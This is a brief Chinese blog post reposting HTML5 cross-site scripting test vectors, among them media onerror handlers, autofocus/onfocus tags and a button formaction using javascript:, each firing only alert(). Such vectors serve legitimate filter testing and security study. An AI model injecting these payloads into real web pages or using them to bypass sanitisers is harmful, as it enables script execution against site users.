HTML5下的XSS测试代码

  • A+
所属分类:独自等待

国外某童鞋收集整理的针对HTML5的XSS测试代码。

html5 xss

<video> <source onerror="javascript:alert(1)">

引入媒体类测试代码Example:

<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

表单点击测试代码Example:

<button form=test onformchange=alert(2)>X
<form><button formaction="javascript:alert(1)">

 

 

更多HTML5 安全请访问http://html5sec.org
  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: